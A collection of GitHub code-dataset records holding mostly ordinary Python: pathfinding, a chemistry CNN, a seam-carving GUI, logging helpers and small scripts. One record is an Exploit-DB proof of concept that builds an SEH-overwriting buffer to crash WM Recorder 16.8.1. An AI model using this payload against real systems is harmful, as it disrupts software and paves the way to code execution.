html_file.close()\n if http_status != 200:\n raise IgnoreRequest(\"request_err\")\n return response","repo_name":"Foreinyel/bodan","sub_path":"adagu_bodan/middlewares/http_status.py","file_name":"http_status.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11306032731","text":"#coding = utf-8\nimport optparse\nparser= optparse.OptionParser('usage %prog -H <target host> -p <targer port>')\nparser.add_option ('-H',dest = 'tgtHost',type='string',help='speify target host')\nparser.add_option('-p',dest='tgtPort',type='int',help='specify target port')\n(option,args) = parser.parse_args()\ntgtHost = options.tgtHost\ntgtPort = options.tgePort\nif (tgtHost == None) | (tgtPort == None):\n print(parser.usage)\n exit(0)\nelse:\n print(tgtHost)\n print(tgtPort)\n \n","repo_name":"Markjunpro/Python","sub_path":"optparse.py","file_name":"optparse.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34496331740","text":"import playground.utils as utils\nfrom playground.main import Playground\n\n\ndef main(args, parser, extra, subparser):\n \"\"\"\n playground deploy https://github.com/rse-ops/flux-tutorials radiuss-aws-2022\n \"\"\"\n utils.ensure_no_extra(extra)\n\n cli = Playground(\n args.repo,\n quiet=args.quiet,\n settings_file=args.settings_file,\n backend=args.backend,\n )\n\n # Update config settings on the fly\n cli.settings.update_params(args.config_params)\n\n # Parse envars if we have any\n cli.list()\n","repo_name":"converged-computing/playground","sub_path":"playground/client/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"3079364360","text":"array = [3, 17, 18, 89, 227, 300]\r\nsearch_value = int(input(\"what are you searching for?\"))\r\n\r\n\r\n# linear search in python\r\ndef linear_search(array, search_value):\r\n # Initialize a counter variable to keep track of the current index\r\n index = 0\r\n # Iterate through every element in the array:\r\n for element in array:\r\n # If we find the value we're looking for, we return its index:\r\n if element == search_value:\r\n return index\r\n # If we reach an element that is greater than the value\r\n # we're looking for, we can exit the loop early:\r\n elif element > search_value:\r\n break\r\n # Increment the counter variable to move to the next index\r\n index += 1\r\n # We return None if we do not find the value within the array:\r\n return None\r\n \r\n\r\n\r\nresult = linear_search(array, search_value)\r\nprint(\"your element is at index\", result)\r\n","repo_name":"steadily-growing/DSA","sub_path":"week1/Algorithms_chapter2.py","file_name":"Algorithms_chapter2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"69890888692","text":"import pymongo\r\nfrom pymongo import MongoClient\r\n\r\nfood_types = [\"protein\", \"carb\", \"fat\"]\r\n\r\n\r\ndef get_database():\r\n connection_string = \"mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000&appName=mongosh+1.5.0\"\r\n\r\n client = MongoClient(connection_string)\r\n return client[\"nutri\"]\r\n\r\n\r\nclass DailyCalories:\r\n def __init__(self, protein, carb, fat):\r\n self.protein = protein\r\n self.carb = carb\r\n self.fat = fat\r\n\r\n def calculate_daily_calories(self):\r\n return self.protein + self.carb + self.fat\r\n\r\n\r\nclass Measurement:\r\n def __init__(self, weight, height):\r\n self.weight = weight\r\n self.height = height\r\n\r\n def find_daily_calories_to_lose_weight(self):\r\n if 150 < self.height < 170:\r\n if 40 < self.weight < 60:\r\n return 2000\r\n elif 61 < self.weight < 80:\r\n return 1800\r\n elif 81 < self.weight < 100:\r\n return 1600\r\n elif self.weight > 100:\r\n return 1400\r\n elif 171 < self.height < 190:\r\n if 40 < self.weight < 60:\r\n return 2200\r\n elif 61 < self.weight < 80:\r\n return 2000\r\n elif 81 < self.weight < 100:\r\n return 1800\r\n elif self.weight > 100:\r\n return 1600\r\n elif self.height >= 190:\r\n if 40 < self.weight < 60:\r\n return 2400\r\n elif 61 < self.weight < 80:\r\n return 2200\r\n elif 81 < self.weight < 100:\r\n return 2000\r\n elif self.weight > 100:\r\n return 1800\r\n\r\n\r\nclass AddUser(Measurement):\r\n def __init__(self, weight, height, username):\r\n super(AddUser, self).__init__(weight, height)\r\n self.username = username\r\n\r\n def insert_user(self,):\r\n item_1 = {\r\n \"name\": self.username,\r\n \"height\": self.height,\r\n \"weight\": self.weight,\r\n }\r\n dbname = get_database()\r\n dbname.users.insert_many([item_1])\r\n\r\n\r\nuser1 = input(\"Enter your name\")\r\nweight1 = int(input(\"Enter your weight\"))\r\nheight1 = int(input(\"Enter your height\"))\r\ninfo = AddUser(username=user1, weight=weight1, height=height1)\r\n\r\nAddUser.insert_user(info)\r\n\r\n\r\nm1 = Measurement(weight1, height1)\r\n\r\ndailyCalories = Measurement.find_daily_calories_to_lose_weight(m1)\r\nprint(f\"Your will have daily {dailyCalories} calories\")\r\nprint(dailyCalories)\r\n\r\ndbname = get_database()\r\n\r\ncollection_name1 = dbname[\"protein\"]\r\ncollection_name2 = dbname[\"carb\"]\r\ncollection_name3 = dbname[\"fat\"]\r\n\r\ndetails = collection_name2.find()\r\n\r\nfor data in details:\r\n print(data)\r\n\r\n# while dailyCalories > 0:\r\n# for food in food_types:\r\n# if food == collection_name1:\r\n# a = dailyCalories - collection_name1.find(\"calories\")\r\n# print(a)\r\n\r\n\r\n\r\n","repo_name":"BerkAcikel45/iakademi-2022","sub_path":"ödev/nutrition duygu/nutritionapp.py","file_name":"nutritionapp.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"22507566645","text":"from cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef validate_body(body: dict, encrypted: bool = False):\n \"\"\"\n Used to validate the request body. This checks for the fields \\\n as well as the types to check that the body is correctly formatted.\n\n Parameters:\n body (dict): The request body that is to be validated\n encrypted (bool): Whether the request is for encrypted data\n Returns:\n errors (list): A list of errors that have been found\n \"\"\"\n expected_fields = {\n 'serums_id': int,\n 'tags': list,\n 'hospital_ids': list\n }\n\n errors = []\n\n for field in expected_fields:\n if field not in body:\n errors.append(f\"Missing required field: {field.upper()}\")\n if field in body and type(body[field]) != expected_fields[field]:\n errors.append(\n f\"Incorrect data type for {field.upper()}. \"\n f\"Expected {str(expected_fields[field])}. \"\n f\"Received {str(type(body[field]))}\")\n if encrypted:\n if 'public_key' not in body:\n errors.append(f\"Missing required field: PUBLIC_KEY\")\n if 'public_key' in body and type(body['public_key']) != str:\n errors.append(\n f\"Incorrect data type for PUBLIC_KEY. \"\n \"Expected str. Received {str(type(body['public_key']))}\")\n if 'public_key' in body:\n try:\n public_key = body['public_key'].encode()\n load_pem_public_key(\n public_key, backend=default_backend()\n )\n except ValueError:\n errors.append(\n f\"Public key incorrectly formatted\"\n )\n return errors\n","repo_name":"SkinnyPigeon/serums_api","sub_path":"components/validation/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10068557413","text":"import math\nimport heapq\n\n\"\"\"\n Here we will write our awesome algorithms\n\"\"\"\n\n\ndef manhattan_dist(p1, p2):\n return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\n\ndef euclidean_dist(p1, p2):\n return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n\ndef get_neighbours(point, matrix):\n res = []\n for i in range(-1, 2):\n for j in range(-1, 2):\n y = point[0] + i\n x = point[1] + j\n if 0 <= x < len(matrix[0]) and 0 <= y < len(matrix) and (y, x) != point and matrix[y][x] != -1:\n res.append((y, x))\n return res\n\n\ndef get_path_length(paths, metric):\n res_length = 0\n for path in paths:\n for i in range(1, len(path)):\n res_length += metric(path[i - 1], path[i])\n return res_length\n\n\ndef astar(matrix, start, end, metric):\n visited = set(start)\n candidates = []\n heapq.heapify(candidates)\n heapq.heappush(candidates, (metric(start, end), (0, [[start]])))\n while len(candidates) > 0:\n f_prev, (g_prev, curr_path) = heapq.heappop(candidates)\n curr_point = curr_path[-1][-1]\n if curr_point in visited:\n continue\n if curr_point == end:\n return curr_path, get_path_length(curr_path, metric)\n visited.add(curr_point)\n\n neighbours = [p for p in get_neighbours(curr_point, matrix) if p not in visited]\n for neighbour in neighbours:\n (y, x) = neighbour\n neighbour_val = matrix[y][x]\n g = g_prev + metric(curr_point, neighbour)\n new_path = [row[:] for row in curr_path]\n new_path[-1].append(neighbour)\n # Portal case:\n if isinstance(neighbour_val, list):\n [i, j] = neighbour_val\n f = g + metric([i, j], end)\n new_path.append([(i, j)])\n heapq.heappush(candidates, (f, (g, new_path)))\n # Point case:\n else:\n f = (g + metric(neighbour, end)) * neighbour_val\n heapq.heappush(candidates, (f, (g, new_path)))\n return None, None\n\n\ndef best_first(matrix, start, end, metric):\n visited = set(start)\n candidates = []\n heapq.heapify(candidates)\n heapq.heappush(candidates, (metric(start, end), [[start]]))\n while len(candidates) > 0:\n f_prev, curr_path = heapq.heappop(candidates)\n curr_point = curr_path[-1][-1]\n if curr_point in visited:\n continue\n if curr_point == end:\n return curr_path, get_path_length(curr_path, metric)\n visited.add(curr_point)\n\n neighbours = [p for p in get_neighbours(curr_point, matrix) if p not in visited]\n for neighbour in neighbours:\n (y, x) = neighbour\n neighbour_val = matrix[y][x]\n new_path = [row[:] for row in curr_path]\n new_path[-1].append(neighbour)\n # Portal case:\n if isinstance(neighbour_val, list):\n [i, j] = neighbour_val\n f = metric((i, j), end)\n new_path.append([(i, j)])\n heapq.heappush(candidates, (f, new_path))\n # Point case:\n else:\n f = metric(neighbour, end) * neighbour_val\n heapq.heappush(candidates, (f, new_path))\n return None, None\n\n\ndef Dijkstra(matrix, start, end, metric=manhattan_dist):\n distances = {start: 0}\n visited = set()\n prev = {}\n candidates = []\n heapq.heapify(candidates)\n heapq.heappush(candidates, (0, start))\n\n while end not in distances:\n (curr_node_dist, curr_node) = heapq.heappop(candidates)\n if curr_node in visited:\n continue\n neighbours = get_neighbours(curr_node, matrix)\n visited.add(curr_node)\n for neighbour in neighbours:\n (y, x) = neighbour\n neighbour_val = matrix[y][x]\n alt_dist = metric(curr_node, neighbour) + curr_node_dist\n # Portal case:\n if isinstance(neighbour_val, list):\n neighbour_tuple = tuple(neighbour_val)\n if ((neighbour_tuple not in distances) or neighbour_tuple in distances and alt_dist < distances[\n neighbour_tuple]) \\\n or ((neighbour not in distances) or neighbour in distances and alt_dist < distances[neighbour]):\n distances[neighbour_tuple] = alt_dist\n distances[neighbour] = alt_dist\n prev[neighbour_tuple] = (curr_node, neighbour, alt_dist)\n prev[neighbour] = (curr_node, neighbour_tuple, alt_dist)\n # heapq.heappush(candidates, (alt_dist, neighbour))\n heapq.heappush(candidates, (distances[neighbour_tuple], neighbour_tuple))\n # Point case:\n else:\n alt_dist *= neighbour_val\n if (neighbour not in distances) or neighbour in distances and alt_dist < distances[neighbour]:\n distances[neighbour] = alt_dist\n prev[neighbour] = (curr_node, None, alt_dist)\n heapq.heappush(candidates, (distances[neighbour], neighbour))\n paths = []\n curr_path = [end]\n curr_node = end\n path_dist = distances[end]\n prev_portal = False\n while curr_node != start:\n (prev_node, portal_node, dist) = prev[curr_node]\n if portal_node and not prev_portal:\n paths.append(curr_path)\n curr_path = [portal_node]\n prev_node = portal_node\n prev_portal = True\n else:\n curr_path = [prev_node] + curr_path\n if prev_portal:\n prev_portal = False\n curr_node = prev_node\n paths.append(curr_path)\n paths.reverse()\n for path in paths:\n path.reverse()\n return paths, path_dist\n","repo_name":"Fronox/alg-project-backend","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31251912076","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 17 11:10:02 2019\r\n\r\n@author: jjohns\r\n\"\"\"\r\n\r\nimport numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport os\r\nimport openbabel as ob\r\nimport multiprocessing as mp\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n#SKlearn Libraries\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.preprocessing import RobustScaler\r\nfrom sklearn.metrics import mean_squared_error\r\nimport xgboost as xgb\r\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\r\nfrom sklearn.metrics import mean_squared_error\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nimport mol_image_3D as mi3D\r\n\r\n#%% Functions Used in models\r\ndef rmsle_cv(model, dataset,y):\r\n \"\"\"\r\n Returns the mean absolute error\r\n \"\"\"\r\n kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(dataset)\r\n rmse= np.log(-cross_val_score(model, dataset, y, scoring=\"neg_mean_absolute_error\", cv = kf))\r\n return(rmse)\r\n \r\n\r\ndef find_path2(mol,atom0_index,atom1_index):\r\n \"\"\"\r\n Find the path between 2 atoms separated by 1 atom\r\n \"\"\"\r\n atom0_index = atom0_index+1\r\n atom1_index = atom1_index+1\r\n atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom0_index))\r\n alist=[]\r\n \r\n index=0\r\n for a in atom_iter:\r\n alist.append(a.GetIdx())\r\n index=index+1\r\n #print('The list of bound atoms is:', alist)\r\n index=0\r\n depth=0\r\n finished=False\r\n for atom_index in alist:\r\n path=atom_index\r\n atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom_index))\r\n for a in atom_iter:\r\n #print(a.GetIdx())\r\n if a.GetIdx() ==atom1_index:\r\n finished=True\r\n break\r\n \r\n if finished:\r\n break\r\n if not finished:\r\n #print('Unable to find a path between atoms',atom0_index-1,' and ',atom1_index-1,'with a depth of 2')\r\n return -1\r\n path=path-1\r\n return path\r\n\r\ndef find_path3(mol,atom0_index,atom1_index):\r\n atom0_index = atom0_index+1\r\n atom1_index = atom1_index+1\r\n atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom0_index))\r\n alist=[]\r\n \r\n path=[0 ,0]\r\n index=0\r\n for a in atom_iter:\r\n alist.append(a.GetIdx())\r\n #print('The list of atoms bound to[',atom0_index,']is:', alist)\r\n index=0\r\n depth=0\r\n finished=False\r\n for atom_index in alist:\r\n path[0]=atom_index\r\n atom_iter=ob.OBAtomAtomIter(mol.GetAtom(atom_index))\r\n alist2=[]\r\n for a in atom_iter:\r\n alist2.append(a.GetIdx())\r\n #print('The atoms connected to atom',path[0],'are:', alist2) \r\n for atom_index2 in alist2:\r\n path[1]=atom_index2\r\n atom_iter2=ob.OBAtomAtomIter(mol.GetAtom(atom_index2))\r\n #print('The atoms connected to',path[1],'are:')\r\n for a2 in atom_iter2:\r\n #print(a2.GetIdx())\r\n if a2.GetIdx() ==atom1_index:\r\n finished=True\r\n break\r\n if finished: \r\n break\r\n if finished:\r\n break\r\n if not finished:\r\n print('Unable to find a path between atoms',atom0_index-1,' and ',atom1_index-1,'with a depth of 3')\r\n return [-1,-1]\r\n path[0]=path[0]-1\r\n path[1]=path[1]-1\r\n return path\r\n\r\n#%% Learning 1JHN\r\ndef Learn1JHN_CNN(train1JHN, model,fname, file_io='read', path=\"X:\\\\CHAMPS\\\\\"):\r\n if file_io=='write':\r\n OBConversion=ob.OBConversion()\r\n OBConversion.SetInFormat(\"xyz\")\r\n print(len(train1JHN))\r\n for index in range(0,len(train1JHN)):\r\n mol=ob.OBMol()\r\n mol_name=train1JHN.iloc[index]['molecule_name'] +'.xyz'\r\n OBConversion.ReadFile(mol,mol_name)\r\n if mol.GetAtom(train1JHN.iloc[index]['atom_index_0'].item()+1).IsNitrogen():\r\n A=train1JHN.iloc[index]['atom_index_0'].item()+1\r\n B=train1JHN.iloc[index]['atom_index_1'].item()+1\r\n else:\r\n A=train1JHN.iloc[index]['atom_index_1'].item()+1\r\n B=train1JHN.iloc[index]['atom_index_0'].item()+1\r\n if index==0:\r\n X=mi3D.make_conv_input(mol,A,B)\r\n X=X.reshape((1,64,64,64,2))\r\n print(X.shape)\r\n else:\r\n tmp=mi3D.make_conv_input(mol,A,B)\r\n X=np.append(X,tmp.reshape(1,64,64,64,2),axis=0)\r\n print(X.shape)\r\n if index % 32 ==0:\r\n print('Molecules 1 - {} made into images'.format(index))\r\n print('index = {}, fname = {}, file = {}, path = {}'.format(index, fname, file_io, path))\r\n np.save(path+fname,X)\r\n else:\r\n X=np.load(path+fname+\".npy\")\r\n print('X loaded successfully')\r\n# X=(X-np.mean(X))/(np.std(X))\r\n Y=np.array(train1JHN['scalar_coupling_constant'].reset_index(drop=True))\r\n Y=Y.reshape((1,len(train1JHN)))\r\n# print(X.shape)\r\n# model=keras.Sequential([\r\n# keras.layers.Dense(256,activation=tf.nn.tanh,input_shape=(64*64*64+6,), kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(128,activation=tf.nn.tanh,kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(16,activation=tf.nn.tanh,kernel_initializer=keras.initializers.he_normal()),\r\n# keras.layers.Dense(1,activation=tf.nn.relu,kernel_initializer=keras.initializers.he_normal())])\r\n \r\n \r\n history=model.fit(X,Y.T,epochs=1, batch_size=32, verbose=2)\r\n# plt.plot(history.history['mean_absolute_error'])\r\n# plt.show()\r\n \r\n return history, model,X\r\n\r\ndef train_1JHN(train, num_epochs=10,batch_size=128,width=64,height=64,depth=64,nchannel=2, pre_load=False):\r\n \r\n \r\n num_minibatches=len(train)//batch_size\r\n J=[]\r\n model=tf.keras.models.Sequential()\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3), activation=tf.nn.relu, input_shape=(height,width,depth,2)))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Conv3D(filters=16,kernel_size=(3,3,3),activation=tf.nn.relu))\r\n model.add(tf.keras.layers.MaxPool3D(pool_size=(2,2,2)))\r\n model.add(tf.keras.layers.Flatten())\r\n model.add(tf.keras.layers.Dense(512,activation=tf.nn.relu))\r\n model.add(tf.keras.layers.Dense(128,activation=tf.nn.relu))\r\n# model.add(tf.keras.layers.Dense(32,activation=tf.nn.relu))\r\n model.add(tf.keras.layers.Dense(1,activation=tf.keras.activations.linear))\r\n model.compile(optimizer='adam', loss='mean_absolute_error',\r\n metrics=['mean_absolute_error'])\r\n model.summary()\r\n os.chdir('structures')\r\n print('Summary over')\r\n for epoch_number in range(num_epochs):\r\n start=time.time()\r\n for batch_number in range(num_minibatches):\r\n if (epoch_number ==0) and (not pre_load):\r\n history,model,X=Learn1JHN_CNN(train.iloc[batch_number*batch_size : (batch_number+1)*batch_size],model,fname='1JHN'+str(batch_number),file_io='write')\r\n else:\r\n history,model,X=Learn1JHN_CNN(train.iloc[batch_number*batch_size : (batch_number+1)*batch_size],model,fname='1JHN'+str(batch_number),file_io='read')\r\n print('Minibatch # {}'.format(batch_number+1))\r\n J.append(history.history['mean_absolute_error'])\r\n if batch_number % 2 ==0:\r\n plt.plot(J)\r\n plt.show()\r\n print('Functional Time to do 5 minibatches is {}'.format(time.time()-start))\r\n print('Finishing epoch number {}'.format(epoch_number))\r\n os.chdir('..\\\\')\r\n return model, J","repo_name":"JEJohnsChem/1JHN_NN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32577312558","text":"#!/usr/bin/python\n\n#\n# Exploit Author: bzyo\n# Twitter: @bzyo_\n# Exploit Title: WM Recorder 16.8.1 - Denial of Service\n# Date: 03-20-2018\n# Vulnerable Software: WM Recorder 16.8.1\n# Vendor Homepage: http://wmrecorder.com/home/\n# Version: 16.8.1\n# Software Link: http://wmrecorder.com/download/wm-recorder/\n# Tested On: Windows 7 x86/x64, Windows 10 x64\n#\n#\n# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,\n# change End Recording date to future date, turn scheduler on, select OK\n#\n# app crashes & EIP overwrite;\n# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh\n# lots of bad chars including \\x90\n#\n\nfilename=\"crash.txt\"\n\njunk = \"\\x41\"*429\n\nnseh = \"\\x42\"*4\n\nseh = \"\\x43\"*4\n\nfill = \"\\x44\"*9562\n\nbuffer = junk + nseh + seh + fill\n\ntextfile = open(filename , 'w')\ntextfile.write(buffer)\ntextfile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/44333.py","file_name":"44333.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"22698513606","text":"types_of_people = 10\nx = f\"There are {types_of_people} types of people.\" #f-string\n\nbinary = \"binary\"\ndo_not = \"don't\"\ny = f\"Those who know {binary} and those who {do_not}.\" # 表示两个变量的f-string\n\nprint(x)\nprint(y)\n\nprint(f\"I said: {x}\") #f-string中套f-string\nprint(f\"I also said: '{y}'\") # f-string中的''仍旧可以表示\n\nhilarious =False\nJoke_evaluation = \"Isn't that joke so funny?! {}\" #预留显示变量的位置{}\n\nprint(Joke_evaluation.format(hilarious)) #使用format函数填上预留位置{};逻辑值直接显示为False\n\nw = \"This is the left side of ...\"\ne = \"a string with a right side.\"\n\nprint(w + e)\n","repo_name":"BettyChen0616/LearnPython-the-HardWay-220213","sub_path":"ex6_format.py","file_name":"ex6_format.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37312436165","text":"import tkinter as tk\nimport customtkinter as ctk\nfrom tkinter import filedialog as fd\nfrom tkinter import ttk\nfrom tkinter.messagebox import showinfo\nfrom PIL import Image, ImageTk\n\nimport seamcarver as sc\n\n#Appearance\nctk.set_appearance_mode(\"dark\")\nctk.set_default_color_theme(\"green\")\n\n# Create the main window\nroot = ctk.CTk()\n\n# Set the window size\nroot.geometry(\"515x190\")\nroot.resizable(False, False)\n\nroot.iconbitmap(\"icon.ico\")\n\nroot.title('Seam Carving')\n\n#Frame for the seam carver---------------------------------------------------------------\nscframe = ctk.CTkFrame(root, \n width = 280, \n height = 400, \n border_width = 2)\nscframe.grid()\nscframe.grid_propagate(False)\n\ninputlabel = ctk.CTkLabel(scframe, text = \"Enter the path to the image:\")\ninputlabel.pack(padx = 2, pady = 2)\n\ninputdialog = ctk.CTkLabel(scframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\ninputdialog.pack(padx = 2, pady = 2)\n\ntemp = ctk.CTkLabel(scframe, text = \"Empty\")\n\ndef open_file():\n filetypes = (\n (\"PNG files\", \"*.png\"), \n (\"All files\", \"*.*\")\n )\n filename = fd.askopenfilename(\n title = \"Open a PNG file\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(filename)>27):\n inputdialog.configure(text = \"Filepath: \" + filename[:28] + \"[...]\")\n else:\n inputdialog.configure(text = \"Filepath: \" + filename)\n temp.configure(text = filename)\n return filename\n\n\n\nopen_button = ctk.CTkButton(\n scframe,\n text = \"Open Image\",\n command = open_file\n)\nopen_button.pack(expand=True)\n\ncarvelabel = ctk.CTkLabel(scframe, text = \"Input number of seams to be carved:\")\ncarvelabel.pack(padx = 2, pady = 2)\n\n\ndef carve():\n global entry\n string = entry.get()\n print(\"Carving...\")\n if(temp.cget(\"text\") == \"Empty\"):\n showinfo(title = \"Error\", message = \"Please select an image to carve.\")\n else:\n sc.main(temp.cget(\"text\"), int(string))\n\nentry = ctk.CTkEntry(scframe)\nentry.focus_set()\nentry.pack(padx = 2, pady = 2)\n\n\ncarvebutton = ctk.CTkButton(scframe, text = \"Carve\", command = carve)\ncarvebutton.pack(padx = 2, pady = 2)\n\n#Frame for the model---------------------------------------------------------------\nmodelframe = ctk.CTkFrame(root, \n width = 280, \n height = 400, \n border_width = 2)\nmodelframe.grid(column = 1, row = 0, padx = 5)\nmodelframe.grid_propagate(False)\n\nmodelinputlabel = ctk.CTkLabel(modelframe, text = \"Enter the path to the image:\")\nmodelinputlabel.pack(padx = 2, pady = 2)\n\nmodelinputdialog = ctk.CTkLabel(modelframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\nmodelinputdialog.pack(padx = 2, pady = 2)\n\nmodeltemp = ctk.CTkLabel(modelframe, text = \"Empty\")\n\ndef open_model():\n filetypes = (\n (\"Model files\", \"*.mdl\"), \n (\"All files\", \"*.*\")\n )\n modelfilename = fd.askopenfilename(\n title = \"Open a Model\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(modelfilename)>27):\n modelinputdialog.configure(text = \"Modelpath: \" + modelfilename[:28] + \"[...]\")\n else:\n modelinputdialog.configure(text = \"Modelpath: \" + modelfilename)\n modeltemp.configure(text = modelfilename)\n return modelfilename\n\n\nopen_model_button = ctk.CTkButton(\n modelframe,\n text = \"Open model\",\n command = open_model\n)\nopen_model_button.pack(expand=True)\n\nmodellabel = ctk.CTkLabel(modelframe, text = \"Enter the path to the image:\")\nmodellabel.pack(padx = 2, pady = 2)\n\nmodelimageinputdialog = ctk.CTkLabel(modelframe, text = \"Filepath: \", \n width = 250, \n height = 10,\n anchor = \"w\",\n compound = \"left\")\nmodelimageinputdialog.pack(padx = 2, pady = 2)\n\nmodelimagetemp = ctk.CTkLabel(modelframe, text = \"Empty\")\n\ndef open_modelimage():\n filetypes = (\n (\"Image files\", \"*.png\"), \n (\"All files\", \"*.*\")\n )\n modelimagefilename = fd.askopenfilename(\n title = \"Open an Image\",\n initialdir = \"/\",\n filetypes = filetypes\n )\n if(len(modelimagefilename)>27):\n modelimageinputdialog.configure(text = \"Modelpath: \" + modelimagefilename[:28] + \"[...]\")\n else:\n modelimageinputdialog.configure(text = \"Modelpath: \" + modelimagefilename)\n modelimagetemp.configure(text = modelimagefilename)\n return modelimagefilename\n\nopen_modelimage_button = ctk.CTkButton(\n modelframe,\n text = \"Open image\",\n command = open_modelimage\n)\nopen_modelimage_button.pack(expand=True)\n\ndef checkimage():\n print(\"Test\")\n\n\n\n\ncheckimagebutton = ctk.CTkButton(modelframe, text = \"Check Image\", command = checkimage)\ncheckimagebutton.pack(padx = 2, pady = 2)\n# Run the main loop\nroot.mainloop()","repo_name":"tleidinggit/ComputerVisionPraktikum","sub_path":"seam_carve_main.py","file_name":"seam_carve_main.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37800407632","text":"\"\"\"Module for utility functions.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport re\nfrom collections.abc import Callable\nfrom pathlib import Path\nfrom time import time\n\nimport pandas as pd\nfrom rich import print as rprint\nfrom rich.logging import RichHandler\n\nfrom modern_ml.constant import P, R\nfrom modern_ml.path import LOGS_DIR\n\n\n# Define function to initialize the logger\ndef init_logger(file_name: str, sym_link_dir: None | str) -> None:\n \"\"\"\n Initialize the logger for the application.\n\n This function sets up the logging configurations, including file logging and standard output logging.\n It also creates sym links to the log file if specified.\n\n Args:\n file_name (str): The name of the log file.\n sym_link_dir (None or str): The directory where sym links to the log file will be created.\n \"\"\"\n # Set the log file path and create it if it does not exist\n log_file: Path = LOGS_DIR / file_name\n log_file.touch(exist_ok=True)\n\n # Create sym links if the directory is specified\n if sym_link_dir:\n sym_link_dir_path = Path(sym_link_dir)\n sym_link_dir_path.mkdir(parents=True, exist_ok=True)\n sym_link_file = sym_link_dir_path / file_name\n sym_link_file.unlink(missing_ok=True)\n sym_link_file.symlink_to(log_file)\n\n # Set the log formatter and handler levels for the log file\n log_formatter = logging.Formatter(\"%(asctime)s:%(levelname)s: %(message)s\")\n log_formatter.datefmt = \"%Y-%m-%d %H:%M:%S\"\n log_handler = logging.FileHandler(str(log_file))\n log_handler.setFormatter(log_formatter)\n log_handler.setLevel(logging.INFO)\n\n # Set the log formatter and handler levels for the standard output\n std_log_formatter = logging.Formatter(\"%(message)s\")\n std_log_formatter.datefmt = \"%H:%M:%S\"\n std_log_handler = RichHandler()\n std_log_handler.setFormatter(std_log_formatter)\n\n # Add handlers to the logger and set the logging level\n logger = logging.getLogger()\n logger.addHandler(std_log_handler)\n logger.addHandler(log_handler)\n logger.setLevel(logging.DEBUG)\n\n # Suppress library logging to only show errors\n for key in logging.Logger.manager.loggerDict:\n logging.getLogger(key).setLevel(logging.ERROR)\n\n # Log the path to log file\n logging.info(f\"Path to log file: {log_file.resolve()}\")\n\n\n# Define a decorator function to print the execution time of a function\ndef timer_decorator(func: Callable[P, R]) -> Callable[P, R]:\n \"\"\"\n Decorator to measure and log the execution time of a function.\n\n Args:\n func (Callable[P, R]): The function to be decorated.\n\n Returns:\n Callable[P, R]: The decorated function which logs its execution time.\n \"\"\"\n\n def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:\n \"\"\"\n Wrapper function to measure the execution time.\n\n Args:\n *args (P.args): Positional arguments for the function.\n **kwargs (P.kwargs): Keyword 